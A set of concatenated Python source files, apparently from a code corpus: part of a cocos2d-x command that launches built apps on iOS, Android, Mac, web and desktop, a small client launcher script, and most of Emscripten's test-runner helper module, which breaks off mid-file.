self._host = args.host
self._browser = args.browser
def get_ios_sim_name(self):
# get the version of xcodebuild
ver = cocos.get_xcode_version()
if ver.startswith("5"):
ret = "ios-sim-xcode5"
else:
ret = "ios-sim-xcode6"
return ret
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
if deploy_dep._use_sdk == 'iphoneos':
cocos.Logging.warning("The generated app is for device. Can't run it on simulator.")
cocos.Logging.warning("The signed app & ipa are generated in path : %s" % os.path.dirname(deploy_dep._iosapp_path))
else:
iossim_exe_path = os.path.join(os.path.dirname(__file__), 'bin', self.get_ios_sim_name())
launch_sim = "%s launch \"%s\" &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = '\"%s/Contents/MacOS/%s\"' % (deploy_dep._macapp_path, deploy_dep.target_name)
self._run_cmd(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(sdk_root, 'platform-tools', 'adb'))
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
pass
def open_webbrowser(self, url):
if self._browser is None:
threading.Event().wait(1)
webbrowser.open_new(url)
else:
if cocos.os_is_mac():
url_cmd = "open -a \"%s\" \"%s\"" % (self._browser, url)
else:
url_cmd = "\"%s\" %s" % (self._browser, url)
self._run_cmd(url_cmd)
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
host = self._host
port = int(self._port)
deploy_dep = dependencies['deploy']
server_address = (host, port)
from threading import Thread
sub_url = deploy_dep.sub_url
url = 'http://%s:%s%s' % (host, port, sub_url)
thread = Thread(target = self.open_webbrowser, args = (url,))
thread.start()
try:
HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
run_root = deploy_dep.run_root
with cocos.pushd(run_root):
cocos.Logging.info("Serving HTTP on %s, port %s ..." % (sa[0], sa[1]))
httpd.serve_forever()
except Exception as e:
cocos.Logging.warning("Start server error ({0}): {1}".format(e.errno, e.strerror))
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info("starting application")
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
|
hpclient.py
|
# Run this script to launch a client and try to connect to a remote
# server defined in the clientconf.toml config file.
from threading import Thread
import hpclient_vulkan as hpclient
# import hpclient_dx12 as hpclient
# import hpclient_gl as hpclient
# Instantiate a new Client.
c = hpclient.Client("clientconf.toml")
# Connect in the background to the server listed in the clientconf.toml file.
Thread(target=c.connect, daemon=True).start()
# Connect in the background to a server with the address given by the first argument.
# Thread(target=c.connect_to, args=("127.0.0.1:8080",), daemon=True).start()
# Print the contents of the Server instance.
print("client contents:")
print(dir(c))
# Start the client's main loop.
c.run()
|
common.py
|
# Copyright 2021 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from enum import Enum
from functools import wraps
from pathlib import Path
from subprocess import PIPE, STDOUT
from urllib.parse import unquote, unquote_plus
from http.server import HTTPServer, SimpleHTTPRequestHandler
import contextlib
import difflib
import hashlib
import logging
import multiprocessing
import os
import re
import shlex
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import time
import webbrowser
import unittest
import clang_native
import jsrun
from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import get_canonical_temp_dir, try_delete, path_from_root
from tools.utils import MACOS, WINDOWS, read_file, read_binary, write_file, write_binary, exit_with_error
from tools import shared, line_endings, building, config
logger = logging.getLogger('common')
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser.
# There are two special value that can be used here if running in an actual
# browser is not desired:
# EMTEST_BROWSER=0 : This will disable the actual running of the test and simply
# verify that it compiles and links.
# EMTEST_BROWSER=node : This will attempt to run the browser test under node.
# For most browser tests this does not work, but it can
# be useful for running pthread tests under node.
EMTEST_BROWSER = None
EMTEST_DETECT_TEMPFILE_LEAKS = None
EMTEST_SAVE_DIR = None
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = None
EMTEST_SKIP_SLOW = None
EMTEST_LACKS_NATIVE_CLANG = None
EMTEST_VERBOSE = None
EMTEST_REBASELINE = None
EMTEST_FORCE64 = None
# Verbosity level control for subprocess calls to configure + make.
# 0: disabled.
# 1: Log stderr of configure/make.
# 2: Log stdout and stderr configure/make. Print out subprocess commands that were executed.
# 3: Log stdout and stderr, and pass VERBOSE=1 to CMake/configure/make steps.
EMTEST_BUILD_VERBOSE = int(os.getenv('EMTEST_BUILD_VERBOSE', '0'))
if 'EM_BUILD_VERBOSE' in os.environ:
exit_with_error('EM_BUILD_VERBOSE has been renamed to EMTEST_BUILD_VERBOSE')
# Special value for passing to assert_returncode which means we expect that program
# to fail with non-zero return code, but we don't care about specifically which one.
NON_ZERO = -1
TEST_ROOT = path_from_root('tests')
WEBIDL_BINDER = shared.bat_suffix(path_from_root('tools/webidl_binder'))
EMBUILDER = shared.bat_suffix(path_from_root('embuilder'))
EMMAKE = shared.bat_suffix(path_from_root('emmake'))
WASM_DIS = Path(building.get_binaryen_bin(), 'wasm-dis')
LLVM_OBJDUMP = os.path.expanduser(shared.build_llvm_tool_path(shared.exe_suffix('llvm-objdump')))
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
# TODO(sbc): Should we make try_delete have a stronger guarantee?
assert not os.path.exists(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return str(Path(TEST_ROOT, *path_components))
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
def compiler_for(filename, force_c=False):
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
return EMXX
else:
return EMCC
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
self.check_dylink()
return func(self, *args, **kwargs)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def requires_node(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_node()
return func(self, *args, **kwargs)
return decorated
def requires_v8(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_v8()
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
@wraps(f)
def decorated(self, *args, **kwargs):
self.setup_node_pthreads()
f(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
assert not callable(updates)
def decorated(f):
def modified(self, *args, **kwargs):
with env_modify(updates):
return f(self, *args, **kwargs)
return modified
return decorated
def also_with_minimal_runtime(f):
assert callable(f)
def metafunc(self, with_minimal_runtime):
assert self.get_setting('MINIMAL_RUNTIME') is None
if with_minimal_runtime:
self.set_setting('MINIMAL_RUNTIME', 1)
f(self)
metafunc._parameterize = {'': (False,),
'minimal_runtime': (True,)}
return metafunc
def also_with_wasm_bigint(f):
assert callable(f)
def metafunc(self, with_bigint):
if with_bigint:
if not self.is_wasm():
self.skipTest('wasm2js does not support WASM_BIGINT')
if self.get_setting('WASM_BIGINT') is not None:
self.skipTest('redundant in bigint test config')
self.set_setting('WASM_BIGINT')
self.require_node()
self.node_args.append('--experimental-wasm-bigint')
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'bigint': (True,)}
return metafunc
def ensure_dir(dirname):
dirname = Path(dirname)
dirname.mkdir(parents=True, exist_ok=True)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_file(name, contents, binary=False):
name = Path(name)
assert not name.is_absolute()
if binary:
name.write_bytes(contents)
else:
name.write_text(contents)
def make_executable(name):
Path(name).chmod(stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('MEMORY64'):
self.skipTest('MEMORY64 does not yet support dynamic linking')
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in ASan yet')
if '-fsanitize=leak' in self.emcc_args:
self.skipTest('no dynamic linking support in LSan yet')
if '-fsanitize=undefined' in self.emcc_args:
self.skipTest('no dynamic linking support in UBSan yet')
def require_v8(self):
if not config.V8_ENGINE or config.V8_ENGINE not in config.JS_ENGINES:
if 'EMTEST_SKIP_V8' in os.environ:
self.skipTest('test requires v8 and EMTEST_SKIP_V8 is set')
else:
self.fail('d8 required to run this test. Use EMTEST_SKIP_V8 to skip')
self.js_engines = [config.V8_ENGINE]
self.emcc_args.append('-sENVIRONMENT=shell')
def require_node(self):
if not config.NODE_JS or config.NODE_JS not in config.JS_ENGINES:
if 'EMTEST_SKIP_NODE' in os.environ:
self.skipTest('test requires node and EMTEST_SKIP_NODE is set')
else:
self.fail('node required to run this test. Use EMTEST_SKIP_NODE to skip')
if self.get_setting('MEMORY64') == 1:
self.skipTest("MEMORY64=1 tests don't yet run under node")
self.js_engines = [config.NODE_JS]
def setup_node_pthreads(self):
self.require_node()
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MEMORY64'):
self.skipTest('node pthreads not yet supported with MEMORY64')
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super().setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super().setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror', '-Wno-limited-postlink-optimizations']
# We want to be strict about closure warnings in our test code.
# TODO(sbc): Remove this if we make it the default for `-Werror`:
# https://github.com/emscripten-core/emscripten/issues/16205):
self.ldflags = ['-sCLOSURE_WARNINGS=error']
self.node_args = [
# Increate stack trace limit to maximise usefulness of test failure reports
'--stack-trace-limit=50',
# Opt in to node v15 default behaviour:
# https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode
'--unhandled-rejections=throw',
# Include backtrace for all uncuaght exceptions (not just Error).
'--trace-uncaught',
]
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
self.js_engines = config.JS_ENGINES.copy()
self.wasm_engines = config.WASM_ENGINES.copy()
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when --save-dir is used we still try to start with an empty directory as many tests
# expect this. --no-clean can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
if type(value) == bool:
value = int(value)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret.append(f'-s{key}')
elif type(value) == list:
ret.append(f'-s{key}={",".join(value)}')
else:
ret.append(f'-s{key}={value}')
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False, ldflags=True):
def is_ldflag(f):
return any(f.startswith(s) for s in ['-sENVIRONMENT=', '--pre-js=', '--post-js='])
args = self.serialize_settings() + self.emcc_args
if ldflags:
args += self.ldflags
else:
args = [a for a in args if not is_ldflag(a)]
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
# use --quiet once its available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
inputfile = os.path.abspath(filename)
# For some reason es-check requires unix paths, even on windows
if WINDOWS:
inputfile = inputfile.replace('\\', '/')
try:
# es-check prints the details of the errors to stdout, but it also prints
# stuff in the case there are no errors:
# ES-Check: there were no ES version matching errors!
# pipe stdout and stderr so that we can choose if/when to print this
# output and avoid spamming stdout when tests are successful.
shared.run_process(es_check + ['es5', inputfile], stdout=PIPE, stderr=STDOUT, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stdout)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False, js_outfile=True, emcc_args=[], output_basename=None):
suffix = '.js' if js_outfile else '.wasm'
compiler = [compiler_for(filename, force_c)]
if compiler[0] == EMCC:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# For historical reasons emcc compiles and links as C++ by default.
# However we want to run our tests in a more strict manner. We can
# remove this if the issue above is ever fixed.
compiler.append('-sNO_DEFAULT_TO_CXX')
if force_c:
compiler.append('-xc')
if output_basename:
output = output_basename + suffix
else:
basename = os.path.basename(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + emcc_args + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + str(include) for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and self.uses_memory_init_file():
src = read_file(output)
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
js = read_file(javascript_file)
blob = "".join(js.splitlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([WASM_DIS, wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def measure_wasm_code_lines(self, wasm):
wat_lines = self.get_wasm_text(wasm).splitlines()
non_data_lines = [line for line in wat_lines if '(data ' not in line]
return len(non_data_lines)
def run_js(self, filename, engine=None, args=[],
output_nicerizer=None,
assert_returncode=0,
interleaved_output=True):
# use files, as PIPE can get too full and hang us
stdout_file = self.in_dir('stdout')
stderr_file = None
if interleaved_output:
stderr = STDOUT
else:
stderr_file = self.in_dir('stderr')
stderr = open(stderr_file, 'w')
error = None
timeout_error = None
if not engine:
engine = self.js_engines[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout_file, 'w'),
stderr=stderr,
assert_returncode=assert_returncode)
except subprocess.TimeoutExpired as e:
timeout_error = e
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
ret = read_file(stdout_file)
if not interleaved_output:
ret += read_file(stderr_file)
if output_nicerizer:
ret = output_nicerizer(ret)
if error or timeout_error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(read_file(stdout_file), end='')
print('-- end program output --')
if not interleaved_output:
print('-- begin program stderr --')
print(read_file(stderr_file), end='')
print('-- end program stderr --')
if timeout_error:
raise timeout_error
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = f'Expected file not found: {filename}'
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with --verbose.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertFileContents(self, filename, contents):
if EMTEST_VERBOSE:
print(f'Comparing results contents of file: {filename}')
contents = contents.replace('\r', '')
if EMTEST_REBASELINE:
with open(filename, 'w') as f:
f.write(contents)
return
if not os.path.exists(filename):
self.fail('Test expectation file not found: ' + filename + '.\n' +
'Run with --rebaseline to generate.')
expected_content = read_file(filename)
message = "Run with --rebaseline to automatically update expectations"
self.assertTextDataIdentical(expected_content, contents, message,
filename, filename + '.new')
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s'" % (limit_size(value), limit_size(string)))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(read_binary(file1),
read_binary(file2))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init=None, cache_name_extra='', native=False):
if env_init is None:
env_init = {}
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
# get_library() is used to compile libraries, and not link executables,
# so we don't want to pass linker flags here (emscripten warns if you
# try to pass linker settings when compiling).
emcc_args = self.get_emcc_args(ldflags=False)
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
write_binary(bc_file, contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
cflags = ' '.join(emcc_args)
env_init.setdefault('CFLAGS', cflags)
env_init.setdefault('CXXFLAGS', cflags)
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native)
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
# In the long run it would nice to completely remove the dependency on
